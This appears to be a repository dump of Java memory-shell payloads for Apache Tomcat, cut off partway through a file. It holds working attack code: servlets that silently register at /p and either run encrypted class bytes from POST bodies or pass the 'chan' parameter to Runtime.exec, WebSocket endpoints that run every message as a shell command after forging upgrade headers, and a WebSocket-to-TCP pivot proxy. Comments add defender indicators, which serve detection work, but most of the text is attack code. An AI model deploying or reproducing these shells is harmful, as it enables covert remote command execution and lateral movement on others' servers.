import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

/**
 * Tomcat 8/9 (javax namespace) servlet, self-registered at {@code /p} on class
 * initialisation, that accepts AES-encrypted class bytes in the body of a POST, loads them
 * in memory and runs the resulting class. Same code as {@code ISRain10} with javax imports.
 *
 * Defender notes: a wrapper named {@code p} / mapping {@code /p} present in the running
 * {@link StandardContext} but in no descriptor or annotation; the key string below; the
 * session attribute {@code "u"}; a class named {@code U} without a backing {@code .class}
 * resource. Errors in RushThere are printed to stderr (catalina.out).
 */
public class ISRain implements Servlet {
    // Fixed AES key shared with the client side; identical across the I* variants on this page.
    private final String pa = "3ad2fddfe8bad8e6";

    /**
     * Runs on class initialisation: builds a {@link Wrapper} for this servlet through
     * reflection, names it {@code p}, marks it load-on-startup, adds it to the current
     * {@link StandardContext} and maps it to {@code /p}. Failure is silent.
     */
    static{
        try{
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            ISRain greetServlet = new ISRain();

            Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
            Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);

            Method gname = Container.class.getDeclaredMethod("setName", String.class);
            gname.invoke(greetWrapper,"p");

Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
            gload.invoke(greetWrapper,1);

            Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
            gservlet.invoke(greetWrapper,greetServlet);

            Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
            gclass.invoke(greetWrapper,greetServlet.getClass().getName());

            Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
            gchild.invoke(standardContext,greetWrapper);

            // Mapping "/p" -> wrapper "p"; the third argument (jspWildCard) is false.
            Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
            gmap.invoke(standardContext,"/p", "p",false);
        }catch (Exception hi){
            // Silent on failure: nothing is logged if registration does not succeed.
            //hi.printStackTrace();
        }
    }

    /** No-op. */
    @Override
    public void init(ServletConfig config) throws ServletException {}

    /** Always null. */
    @Override
    public String getServletInfo() {return null;}

    /** No-op; getServletConfig (same line, no @Override) always returns null. */
    @Override
    public void destroy() {} public ServletConfig getServletConfig() {return null;}

    /**
     * Entry point for {@code /p}. Builds the session/request/response map for the loaded
     * class and, on POST only, walks the context class loader's superclass chain (up to six
     * levels) until it reaches {@code java.lang.ClassLoader}; that class is handed to
     * {@link #RushThere}. Non-POST requests fall through and produce no output here.
     *
     * @param servletRequest  current request (cast to HttpServletRequest)
     * @param servletResponse current response (cast to HttpServletResponse)
     */
    @Override
    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
        HttpServletRequest request = (HttpServletRequest) servletRequest;
        HttpServletResponse response = (HttpServletResponse) servletResponse;
        // Creates a session when none exists.
        HttpSession session = request.getSession();

        Map pageContext = new HashMap();
        pageContext.put("session", session);
        pageContext.put("request", request);
        pageContext.put("response", response);

        ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();

        if (request.getMethod().equals("POST")){
            // Each branch differs only in how many superclass hops reach java.lang.ClassLoader.
            if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else {
                // Sixth hop is taken unconditionally; deeper hierarchies are not checked.
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }
        }
    }

    /**
     * Second stage: loads (or reflectively defines) a helper class named {@code U} on the
     * webapp class loader and uses it to turn the AES-decrypted request body into a class
     * whose {@code equals(Object)} is invoked with the context map. Only memory is touched.
     *
     * @param Lclass      class on which the private {@code defineClass(byte[],int,int)} is looked up
     * @param cl          thread-context class loader the helper class is defined in
     * @param session     HTTP session; the key is written to its attribute {@code "u"}
     * @param request     current request; only the first line of its body is read
     * @param pageContext map handed to the loaded class (keys "session", "request", "response")
     */
    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
        // Embedded bytecode of the helper class (elided on this page).
        byte[] bytecode = java.util.Base64.getDecoder().decode("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");
        try {
            // Private ClassLoader.defineClass reached reflectively: no JAR or classpath entry is involved.
            java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            define.setAccessible(true);
            Class uclass = null;
            try {
                // Reuse the helper if an earlier request already defined it in this loader.
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException e) {
                uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
            }
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = pa;
            // The key is stored in the session on every POST — visible in session dumps.
            session.setAttribute("u", k);
            // Mode 2 == Cipher.DECRYPT_MODE; bare "AES" leaves mode/padding to the provider default.
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            // Body: one Base64 line (internal sun.misc decoder), AES-encrypted class bytes.
            byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class) Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            // The loaded class's entry point is its equals(Object); it receives the context map.
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
            return;
        }catch (Exception ig){
            // Printed to stderr: a wrong key or malformed body leaves a stack trace in catalina.out.
            ig.printStackTrace();
        }
    }
}

--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/SRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat89/SRain.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/SRain.java:
--------------------------------------------------------------------------------
import org.apache.catalina.Container;
import org.apache.catalina.Wrapper;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Method;

/**
 * Tomcat 8/9 (javax namespace) servlet, self-registered at {@code /p} on class
 * initialisation, that executes the request parameter {@code chan} as an OS command and
 * answers 404 to everything else. Twin of {@code SRain10}.
 *
 * Defender notes: probing {@code /p} looks like a missing resource; hunt for the
 * {@code chan} parameter in access logs and for a wrapper named {@code p} in the running
 * context that no descriptor declares.
 */
public class SRain implements Servlet {

    /**
     * Runs on class initialisation: builds a {@link Wrapper} for this servlet through
     * reflection, names it {@code p}, adds it to the current {@link StandardContext} and maps
     * it to {@code /p}. Failure is silent.
     */
    static{
        try{
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext =
(StandardContext) webappClassLoaderBase.getResources().getContext();

            SRain greetServlet = new SRain();

            Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
            Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);

            Method gname = Container.class.getDeclaredMethod("setName", String.class);
            gname.invoke(greetWrapper,"p");

            Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
            gload.invoke(greetWrapper,1);

            Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
            gservlet.invoke(greetWrapper,greetServlet);

            Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
            gclass.invoke(greetWrapper,greetServlet.getClass().getName());

            Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
            gchild.invoke(standardContext,greetWrapper);

            // Mapping "/p" -> wrapper "p"; the third argument (jspWildCard) is false.
            Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
            gmap.invoke(standardContext,"/p", "p",false);
        }catch (Exception hi){
            // Silent on failure: nothing is logged if registration does not succeed.
            //hi.printStackTrace();
        }
    }

    /** No-op. */
    @Override
    public void init(ServletConfig config) throws ServletException {}

    /** Always null. */
    @Override
    public String getServletInfo() {return null;}

    /** No-op; getServletConfig (same line, no @Override) always returns null. */
    @Override
    public void destroy() {} public ServletConfig getServletConfig() {return null;}

    /**
     * Entry point for {@code /p}. When a {@code chan} parameter is present its value is run
     * as an OS command and the process's standard output is written to the response (via the
     * raw ServletResponse here, unlike SRain10), which is then closed; otherwise the response
     * is a 404. Exceptions propagate to the container.
     *
     * Defender notes: the parameter name {@code chan} is a fixed indicator; at host level this
     * is the Tomcat JVM spawning a child process from a request-handling thread.
     *
     * @param servletRequest  current request (cast to HttpServletRequest)
     * @param servletResponse current response
     */
    @Override
    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        HttpServletResponse resp = (HttpServletResponse) servletResponse;
        if (req.getParameter("chan") != null){
            // Parameter value is passed verbatim to Runtime.exec.
            Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                    new java.io.InputStreamReader(process.getInputStream()));
            StringBuilder stringBuilder = new StringBuilder();
            String line;
            while ((line = bufferedReader.readLine()) != null) {
                stringBuilder.append(line + '\n');
            }
            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
            servletResponse.getOutputStream().flush();
            servletResponse.getOutputStream().close();
            return;
        }
        else{
            // Plain requests to /p look like a missing resource.
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
        }
    }
}
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.java:
--------------------------------------------------------------------------------
import java.io.IOException;
import java.util.*;
import java.io.InputStream;
import java.lang.reflect.Field;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.websocket.Endpoint;
import javax.websocket.Session;
import javax.websocket.EndpointConfig;
import javax.websocket.MessageHandler;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;
import org.apache.tomcat.websocket.server.WsServerContainer;
import org.apache.tomcat.websocket.server.UpgradeUtil;
import org.apache.tomcat.util.http.MimeHeaders;

/**
 * WebSocket endpoint that runs every text message it receives as a shell command and sends
 * the command's standard output back on the same session. The static initializer at the
 * bottom forces a WebSocket upgrade of the request currently being handled by rewriting
 * that request's own upgrade headers and calling Tomcat's UpgradeUtil directly; the
 * directory name suggests this is how a front proxy that strips upgrade headers is worked
 * around (not verifiable from this file).
 *
 * Defender notes: a backend WebSocket session with no matching {@code Upgrade} request in
 * the proxy/CDN logs is the network-level signal; {@code cmd.exe /c} or {@code /bin/bash -c}
 * spawned by the Tomcat JVM from a WebSocket thread is the host-level one. The endpoint
 * path is {@code /x}.
 */
public class CmdEndpoint extends Endpoint implements MessageHandler.Whole {
/*
 * CmdEndpoint, continued from the class header above.
 *
 * What this class is: a Tomcat WebSocket endpoint that runs every text frame
 * it receives as a shell command and returns stdout. There is no
 * authentication, no allow-list and no command filtering anywhere in it:
 * whoever completes the handshake runs commands as the Tomcat process user.
 * The static block at the bottom binds the endpoint to the request being
 * served at the moment the class is initialized; presumably that moment is
 * when the injector loads the class (the tool delivers it via RMI/JNDI) —
 * confirm against the loader.
 */
    private Session session;

    /**
     * Executes {@code s} verbatim: {@code cmd.exe /c s} when os.name starts
     * with "windows", {@code /bin/bash -c s} everywhere else. Only stdout is
     * read (getErrorStream() is never drained), one byte at a time, and each
     * byte is widened to a char, so multi-byte UTF-8 output comes back
     * mangled. waitFor() blocks the handler until the command exits; the
     * collected output is then sent as a single text frame. Exceptions are
     * only printed to the server's stderr — on failure the caller gets no
     * frame at all.
     */
    @Override
    public void onMessage(String s) {
        try {
            Process process;
            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
            if (bool) {
                process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", s});
            } else {
                process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", s});
            }
            InputStream inputStream = process.getInputStream();
            StringBuilder stringBuilder = new StringBuilder();
            int i;
            while ((i = inputStream.read()) != -1)
                stringBuilder.append((char) i);
            inputStream.close();
            process.waitFor();
            session.getBasicRemote().sendText(stringBuilder.toString());
        } catch (Exception exception) {
            exception.printStackTrace();
        }
    }

    /** Remembers the session and registers this object as its text-frame handler. */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.session = session;
        session.addMessageHandler(this);
    }

    /**
     * Overwrites a header on the *incoming* request in place, something the
     * servlet API does not allow. It digs through three private fields —
     * "request", then "coyoteRequest", then "headers" — which match the
     * field names of Tomcat's RequestFacade -> Request -> coyote Request
     * chain (presumably; nothing else here confirms the layout). On another
     * container, or if the request object is wrapped, getDeclaredField throws
     * and the failure is only printed, leaving the header untouched. Any
     * existing value is removed before the new one is added.
     * NOTE(review): reflective access to "coyoteRequest"/"headers" from
     * application code is itself a good hunting signal.
     */
    private void SetHeader(HttpServletRequest request, String key, String value) {
        Class requestClass = request.getClass();
        try {
            Field requestField = requestClass.getDeclaredField("request");
            requestField.setAccessible(true);
            Object requestObj = requestField.get(request);
            Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
            coyoteRequestField.setAccessible(true);
            Object coyoteRequestObj = coyoteRequestField.get(requestObj);
            Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
            headersField.setAccessible(true);
            MimeHeaders headersObj = (MimeHeaders) headersField.get(coyoteRequestObj);
            headersObj.removeHeader(key);
            headersObj.addValue(key).setString(value);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /*
     * Static initializer: the injection itself, run once when the class is
     * loaded. Both locals are literally null here, so as written the first
     * dereference throws a NullPointerException during class initialization;
     * presumably the injector substitutes the live request/response before
     * the class is loaded — confirm against the tool.
     */
    static {
        HttpServletRequest request = null;
        HttpServletResponse response = null;
        ServletContext servletContext =
/*
 * CmdEndpoint static initializer, continued: turn the plain HTTP request
 * currently being served into a WebSocket connection bound to this class.
 * getSession() (not getSession(false)) creates an HTTP session as a side
 * effect.
 */
            request.getSession().getServletContext();
        // Endpoint config for the literal path "/x". It is never registered
        // with the container (no addEndpoint), so only this one connection is
        // upgraded — nothing persists in the container's endpoint table.
        ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint.class, "/x").build();
        WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
        Map pathParams = Collections.emptyMap();
        // Only used to reach the instance method SetHeader; the endpoint that
        // actually serves the connection is presumably created by the
        // configurator inside doUpgrade.
        CmdEndpoint cmdEndpoint = new CmdEndpoint();
        // Forge the upgrade headers on the request so Tomcat's UpgradeUtil
        // accepts it as a WebSocket handshake even though the client never
        // sent them. The directory name suggests the point is to get past an
        // nginx/CDN hop that does not forward Upgrade headers — confirm.
        // Sec-WebSocket-Key is NOT forged here (compare ProxyEndpoint), so
        // presumably the client still has to supply one; check UpgradeUtil.
        cmdEndpoint.SetHeader(request, "Connection", "upgrade");
        cmdEndpoint.SetHeader(request, "Sec-WebSocket-Version", "13");
        cmdEndpoint.SetHeader(request, "Upgrade", "websocket");
        try {
            // Completes the handshake on the current connection; on the wire
            // this presumably shows as a 101 on a URL that is not a configured
            // WebSocket endpoint. Failures are only printed.
            UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
        } catch (ServletException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.class
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.java:
// --------------------------------------------------------------------------------

import java.util.*;
import java.io.InputStream;
import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;
import org.apache.tomcat.websocket.server.WsServerContainer;
import org.apache.tomcat.websocket.Constants;
import javax.websocket.*;
import org.apache.tomcat.websocket.server.WsHandshakeRequest;
import org.apache.tomcat.websocket.WsHandshakeResponse;
import
java.nio.charset.StandardCharsets;
import org.apache.tomcat.util.codec.binary.Base64;
import org.apache.tomcat.util.security.ConcurrentMessageDigest;
import org.apache.tomcat.websocket.server.WsHttpUpgradeHandler;
import org.apache.tomcat.websocket.Transformation;
import org.apache.catalina.connector.RequestFacade;

/**
 * Variant of CmdEndpoint with the same unauthenticated command-execution
 * handler; the difference is that the WebSocket handshake is performed by
 * hand in the static block (101 + Sec-WebSocket-Accept computed here) instead
 * of through UpgradeUtil.
 */
public class CmdEndpoint2 extends Endpoint implements MessageHandler.Whole {
    private Session session;
    /**
     * Same as CmdEndpoint.onMessage: runs {@code s} through cmd.exe /c or
     * /bin/bash -c, collects stdout byte-by-byte (stderr is never read,
     * non-ASCII output is mangled), waits for exit and sends stdout back as
     * one text frame; exceptions only reach the server's stderr.
     */
    @Override
    public void onMessage(String s) {
        try {
            Process process;
            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
            if (bool) {
                process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
            } else {
                process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
            }
            InputStream inputStream = process.getInputStream();
            StringBuilder stringBuilder = new StringBuilder();
            int i;
            while ((i = inputStream.read()) != -1)
                stringBuilder.append((char)i);
            inputStream.close();
            process.waitFor();
            session.getBasicRemote().sendText(stringBuilder.toString());
        } catch (Exception exception) {
            exception.printStackTrace();
        }
    }
    /** Remembers the session and registers this object as its text-frame handler. */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.session = session;
        session.addMessageHandler(this);
    }

    /**
     * RFC 6455 Sec-WebSocket-Accept: base64(SHA-1(key + the fixed GUID)).
     * Throws NullPointerException when {@code key} is null; the static block
     * calls it with the raw request header and no null check.
     */
    private static String getWebSocketAccept(String key) {
        byte[] WS_ACCEPT = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11".getBytes(StandardCharsets.ISO_8859_1);
        byte[] digest = ConcurrentMessageDigest.digestSHA1(key.getBytes(StandardCharsets.ISO_8859_1), WS_ACCEPT);
        return Base64.encodeBase64String(digest);
    }
    /*
     * Static initializer: manual handshake on the request being served. As in
     * CmdEndpoint, request and response are literally null here and would NPE
     * on first use; presumably the injector substitutes the live objects —
     * confirm. No extensions, sub-protocol or transformation are negotiated.
     */
    static {
        HttpServletRequest request =null;
        HttpServletResponse response = null;
        Map pathParams = Collections.emptyMap();
        List negotiatedExtensionsPhase = Collections.emptyList();
        Transformation transformation = null;
        String
/*
 * CmdEndpoint2 static initializer, continued.
 */
               subProtocol = null;
        // getSession() (not getSession(false)) creates an HTTP session.
        ServletContext servletContext = request.getSession().getServletContext();
        // Bound to the literal path "/x"; never registered with the container.
        ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint2.class, "/x").build();
        WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
        // Hand-rolled "101 Switching Protocols". The request's own
        // Upgrade/Connection headers are never checked, and a missing
        // Sec-WebSocket-Key makes getWebSocketAccept NPE outside any try.
        response.setHeader(Constants.UPGRADE_HEADER_NAME, Constants.UPGRADE_HEADER_VALUE);
        response.setHeader(Constants.CONNECTION_HEADER_NAME, Constants.CONNECTION_HEADER_VALUE);
        response.setHeader(HandshakeResponse.SEC_WEBSOCKET_ACCEPT, getWebSocketAccept(request.getHeader("Sec-WebSocket-Key")));
        response.setStatus(101);
        WsHandshakeRequest wsRequest = new WsHandshakeRequest(request, pathParams);
        // wsResponse is handed to the configurator but nothing it sets is
        // copied back onto the real response.
        WsHandshakeResponse wsResponse = new WsHandshakeResponse();
        configEndpoint.getConfigurator().modifyHandshake(configEndpoint, wsRequest, wsResponse);
        try {
            // Switches the connection to Tomcat's WebSocket upgrade handler.
            // The cast needs the unwrapped RequestFacade; a wrapped request
            // (filter chain, framework wrapper) fails here and is only printed.
            WsHttpUpgradeHandler wsHandler = ((RequestFacade)request).upgrade(WsHttpUpgradeHandler.class); //RequestFacade use for Tomcat 7
            // Tomcat 8+ preInit signature; the Tomcat 7 form is kept below.
            wsHandler.preInit(configEndpoint, container, wsRequest, negotiatedExtensionsPhase, subProtocol, transformation, pathParams, request.isSecure());
            // Tomcat 7 //wsHandler.preInit((Endpoint)configEndpoint, configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
        }catch (Exception e) {
            e.printStackTrace();
        }
    }
}
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$1.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$1.class
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$2.class:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$2.class -------------------------------------------------------------------------------- /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$Attach.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$Attach.class -------------------------------------------------------------------------------- /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.class -------------------------------------------------------------------------------- /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.java: -------------------------------------------------------------------------------- 1 | import java.io.IOException; 2 | import java.util.*; 3 | import javax.servlet.ServletContext; 4 | import javax.servlet.ServletException; 5 | import javax.servlet.http.HttpServletRequest; 6 | import javax.servlet.http.HttpServletResponse; 7 | import javax.websocket.server.ServerContainer; 8 | import javax.websocket.server.ServerEndpointConfig; 9 | import org.apache.tomcat.websocket.server.WsServerContainer; 10 | import org.apache.tomcat.websocket.server.UpgradeUtil; 11 | import org.apache.tomcat.util.http.MimeHeaders; 12 | import java.io.ByteArrayOutputStream; 13 | import java.nio.channels.AsynchronousSocketChannel; 14 | import java.nio.ByteBuffer; 15 | import java.nio.channels.CompletionHandler; 16 | import java.net.InetSocketAddress; 17 | import 
java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.lang.reflect.Field;
import javax.websocket.*;

/**
 * WebSocket-to-TCP forwarder, bound per request by the static block in the
 * same way as CmdEndpoint. Protocol, as implemented in process(): the first
 * binary frame of a session is read as an HTTP request line whose second
 * token is host:port (i.e. a CONNECT line); the endpoint opens a TCP
 * connection to it and answers with a fake "HTTP/1.1 200 Connection
 * Established" or "503" text frame; every later frame is written raw to that
 * socket and whatever the socket returns is sent back as binary frames.
 * Net effect: an unauthenticated outbound TCP pivot from the Tomcat host to
 * anything it can reach.
 */
public class ProxyEndpoint extends Endpoint {
    // Frame counter for the session, reset in onOpen. It is an instance
    // field, so it is per-session only if the container gives each
    // connection its own ProxyEndpoint instance — presumably the default.
    long i =0;
    // Scratch accumulator for bytes read from the upstream socket.
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    // Session id -> upstream AsynchronousSocketChannel (raw types throughout).
    HashMap map = new HashMap();
    /** Attachment carried through the async read: upstream socket + WebSocket session. */
    static class Attach {
        public AsynchronousSocketChannel client;
        public Session channel;
    }
    /**
     * Arms one async read (fresh 50000-byte buffer) on the upstream socket;
     * the completion handler pushes the bytes to the session and re-arms.
     * Note the first statement of completed() is buffer.clear(), which resets
     * position to 0 and limit to capacity, so hasRemaining() is always true
     * and the condition is effectively just result >= 0; the bytes are then
     * copied from position 0, where the read left them. On EOF (result == -1)
     * the else branch does nothing: reading silently stops and neither the
     * socket nor the session is closed. Exceptions are swallowed; read
     * failures are only printed.
     */
    void readFromServer(Session channel,AsynchronousSocketChannel client){
        final ByteBuffer buffer = ByteBuffer.allocate(50000);
        Attach attach = new Attach();
        attach.client = client;
        attach.channel = channel;
        client.read(buffer, attach, new CompletionHandler() {
            @Override
            public void completed(Integer result, final Attach scAttachment) {
                buffer.clear();
                try {
                    if(buffer.hasRemaining() && result>=0)
                    {
                        byte[] arr = new byte[result];
                        ByteBuffer b = buffer.get(arr,0,result);
                        baos.write(arr,0,result);
                        ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
                        if (scAttachment.channel.isOpen()) {
                            scAttachment.channel.getBasicRemote().sendBinary(q);
                        }
                        baos = new ByteArrayOutputStream();
                        readFromServer(scAttachment.channel,scAttachment.client);
                    }else{
                        if(result > 0)
                        {
                            byte[] arr = new byte[result];
                            ByteBuffer b = buffer.get(arr,0,result);
                            baos.write(arr,0,result);
                            readFromServer(scAttachment.channel,scAttachment.client);
                        }
                    }
                } catch (Exception ignored) {}
            }
            @Override
            public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
        });
    }
    /**
     * Handles one inbound frame. Frame 1 (i==1): parse "<verb> host:port ..."
     * and connect with a 10 s timeout; frames 2+ (i>1): blocking write of the
     * whole buffer to the upstream socket (the flip()/clear() afterwards do
     * not change what was sent). Everything — including a malformed first
     * frame (no space, no ':', bad port) — is silently swallowed by the outer
     * catch, so the client just sees nothing.
     */
    void process(ByteBuffer z,Session channel)
    {
        try{
            if(i>1)
            {
                AsynchronousSocketChannel client = map.get(channel.getId());
                client.write(z).get();
                z.flip();
                z.clear();
            }
            else if(i==1)
            {
                // Platform-charset decode of the whole backing array (the
                // caller clear()ed the buffer, so limit == capacity).
                String values = new String(z.array());
                String[] array = values.split(" ");
                String[] addrarray =
/*
 * ProxyEndpoint.process, continued: connect to the host:port named in the
 * first frame.
 */
                                     array[1].split(":");
                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
                int po = Integer.parseInt(addrarray[1]);
                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
                Future future = client.connect(hostAddress);
                try {
                    future.get(10, TimeUnit.SECONDS);
                } catch(Exception ignored){
                    // Connect failed or timed out: fake a 503. The opened
                    // channel is not closed.
                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
                    return;
                }
                map.put(channel.getId(), client);
                readFromServer(channel,client);
                // Mimics an HTTP CONNECT proxy's success line.
                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
            }
        }catch(Exception ignored){
        }
    }
    /**
     * Per-connection setup: resets the frame counter, raises both message
     * buffer limits to 20 MiB and installs a binary handler. message.clear()
     * before process() sets limit = capacity, so process() sees the whole
     * backing array rather than just the frame; if the container hands over
     * a buffer larger than the frame, trailing bytes are forwarded too —
     * confirm against Tomcat's buffer handling.
     */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        i=0;
        session.setMaxBinaryMessageBufferSize(1024*1024*20);
        session.setMaxTextMessageBufferSize(1024*1024*20);
        session.addMessageHandler(new MessageHandler.Whole() {
            @Override
            public void onMessage(ByteBuffer message) {
                try {
                    message.clear();
                    i++;
                    process(message,session);
                } catch (Exception ignored) {
                }
            }
        });
    }

    /**
     * Same reflective header rewrite as CmdEndpoint.SetHeader: walks the
     * private fields "request" -> "coyoteRequest" -> "headers" (Tomcat's
